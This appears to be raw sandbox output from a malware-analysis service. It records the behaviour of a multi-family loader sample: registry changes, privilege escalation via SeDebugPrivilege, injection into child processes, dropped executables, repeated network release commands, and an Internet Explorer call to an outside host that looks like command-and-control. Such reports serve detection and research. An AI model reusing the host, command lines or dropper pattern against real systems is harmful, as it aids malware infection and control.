Set value (str) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4097847965-469305640-2969917343-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "385700650" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Temp\gaysqlidbvtnlfdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Temp\i_qljdbvtnlg.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_qkicavsnlf.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_kfdxvpnifa.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_causmkecxu.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_fzxrpkhczu.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wrpjhbzurm.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_rmjecwuomg.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_igbytrljdb.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_oigaytqljd.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_igaysqlida.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_faysqkicav.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_causmkfcxu.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_kfcxupnhfz.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ecwupmhfzx.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_bztrljebwu.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ywqojgbztr.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_eywqoigbyt.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_yvqoigaytq.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_sqlidavtnl.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_pnhfaxsqki.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3092 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe C:\Temp\gaysqlidbvtnlfdy.exe
PID 3092 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe C:\Temp\gaysqlidbvtnlfdy.exe
PID 3092 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe C:\Temp\gaysqlidbvtnlfdy.exe
PID 3092 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3092 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2168 wrote to memory of 4488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2168 wrote to memory of 4488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2168 wrote to memory of 4488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2212 wrote to memory of 3648 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 3648 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 3648 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2228 wrote to memory of 32 N/A C:\Temp\qljdbvtnlg.exe C:\temp\CreateProcess.exe
PID 2228 wrote to memory of 32 N/A C:\Temp\qljdbvtnlg.exe C:\temp\CreateProcess.exe
PID 2228 wrote to memory of 32 N/A C:\Temp\qljdbvtnlg.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1776 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1776 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1776 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 724 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 724 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 724 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 1168 wrote to memory of 5076 N/A C:\Temp\qkicavsnlf.exe C:\temp\CreateProcess.exe
PID 1168 wrote to memory of 5076 N/A C:\Temp\qkicavsnlf.exe C:\temp\CreateProcess.exe
PID 1168 wrote to memory of 5076 N/A C:\Temp\qkicavsnlf.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 2632 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 2632 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 2632 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 4428 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 4428 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 4428 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 3920 wrote to memory of 4848 N/A C:\Temp\kfdxvpnifa.exe C:\temp\CreateProcess.exe
PID 3920 wrote to memory of 4848 N/A C:\Temp\kfdxvpnifa.exe C:\temp\CreateProcess.exe
PID 3920 wrote to memory of 4848 N/A C:\Temp\kfdxvpnifa.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 720 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 720 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 720 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 184 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 184 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 184 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 1876 wrote to memory of 1048 N/A C:\Temp\causmkecxu.exe C:\temp\CreateProcess.exe
PID 1876 wrote to memory of 1048 N/A C:\Temp\causmkecxu.exe C:\temp\CreateProcess.exe
PID 1876 wrote to memory of 1048 N/A C:\Temp\causmkecxu.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 3256 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 3256 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 3256 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1616 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1616 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1616 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 1488 wrote to memory of 1416 N/A C:\Temp\fzxrpkhczu.exe C:\temp\CreateProcess.exe
PID 1488 wrote to memory of 1416 N/A C:\Temp\fzxrpkhczu.exe C:\temp\CreateProcess.exe
PID 1488 wrote to memory of 1416 N/A C:\Temp\fzxrpkhczu.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 760 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 760 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 760 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1084 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1084 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1084 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2992 wrote to memory of 1592 N/A C:\Temp\wrpjhbzurm.exe C:\temp\CreateProcess.exe
PID 2992 wrote to memory of 1592 N/A C:\Temp\wrpjhbzurm.exe C:\temp\CreateProcess.exe
PID 2992 wrote to memory of 1592 N/A C:\Temp\wrpjhbzurm.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1780 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1780 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 1780 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 4064 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe
PID 2212 wrote to memory of 4064 N/A C:\Temp\gaysqlidbvtnlfdy.exe C:\temp\CreateProcess.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe

"C:\Users\Admin\AppData\Local\Temp\2025-07-03_7f6f386c0b5b6c9daf623873f4426a36_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe"

C:\Temp\gaysqlidbvtnlfdy.exe

C:\Temp\gaysqlidbvtnlfdy.exe run

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2168 CREDAT:17410 /prefetch:2

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qljdbvtnlg.exe ups_run

C:\Temp\qljdbvtnlg.exe

C:\Temp\qljdbvtnlg.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qljdbvtnlg.exe ups_ins

C:\Temp\i_qljdbvtnlg.exe

C:\Temp\i_qljdbvtnlg.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qkicavsnlf.exe ups_run

C:\Temp\qkicavsnlf.exe

C:\Temp\qkicavsnlf.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qkicavsnlf.exe ups_ins

C:\Temp\i_qkicavsnlf.exe

C:\Temp\i_qkicavsnlf.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kfdxvpnifa.exe ups_run

C:\Temp\kfdxvpnifa.exe

C:\Temp\kfdxvpnifa.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kfdxvpnifa.exe ups_ins

C:\Temp\i_kfdxvpnifa.exe

C:\Temp\i_kfdxvpnifa.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\causmkecxu.exe ups_run

C:\Temp\causmkecxu.exe

C:\Temp\causmkecxu.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_causmkecxu.exe ups_ins

C:\Temp\i_causmkecxu.exe

C:\Temp\i_causmkecxu.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\fzxrpkhczu.exe ups_run

C:\Temp\fzxrpkhczu.exe

C:\Temp\fzxrpkhczu.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_fzxrpkhczu.exe ups_ins

C:\Temp\i_fzxrpkhczu.exe

C:\Temp\i_fzxrpkhczu.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\wrpjhbzurm.exe ups_run

C:\Temp\wrpjhbzurm.exe

C:\Temp\wrpjhbzurm.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_wrpjhbzurm.exe ups_ins

C:\Temp\i_wrpjhbzurm.exe

C:\Temp\i_wrpjhbzurm.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\rmjecwuomg.exe ups_run

C:\Temp\rmjecwuomg.exe

C:\Temp\rmjecwuomg.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_rmjecwuomg.exe ups_ins

C:\Temp\i_rmjecwuomg.exe

C:\Temp\i_rmjecwuomg.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\igbytrljdb.exe ups_run

C:\Temp\igbytrljdb.exe

C:\Temp\igbytrljdb.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_igbytrljdb.exe ups_ins

C:\Temp\i_igbytrljdb.exe

C:\Temp\i_igbytrljdb.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\oigaytqljd.exe ups_run

C:\Temp\oigaytqljd.exe

C:\Temp\oigaytqljd.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_oigaytqljd.exe ups_ins

C:\Temp\i_oigaytqljd.exe

C:\Temp\i_oigaytqljd.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\igaysqlida.exe ups_run

C:\Temp\igaysqlida.exe

C:\Temp\igaysqlida.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_igaysqlida.exe ups_ins

C:\Temp\i_igaysqlida.exe

C:\Temp\i_igaysqlida.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\faysqkicav.exe ups_run

C:\Temp\faysqkicav.exe

C:\Temp\faysqkicav.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_faysqkicav.exe ups_ins

C:\Temp\i_faysqkicav.exe

C:\Temp\i_faysqkicav.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\causmkfcxu.exe ups_run

C:\Temp\causmkfcxu.exe

C:\Temp\causmkfcxu.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_causmkfcxu.exe ups_ins

C:\Temp\i_causmkfcxu.exe

C:\Temp\i_causmkfcxu.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kfcxupnhfz.exe ups_run

C:\Temp\kfcxupnhfz.exe

C:\Temp\kfcxupnhfz.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kfcxupnhfz.exe ups_ins

C:\Temp\i_kfcxupnhfz.exe

C:\Temp\i_kfcxupnhfz.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ecwupmhfzx.exe ups_run

C:\Temp\ecwupmhfzx.exe

C:\Temp\ecwupmhfzx.exe ups_run

C:\temp\CreateProcess.exe

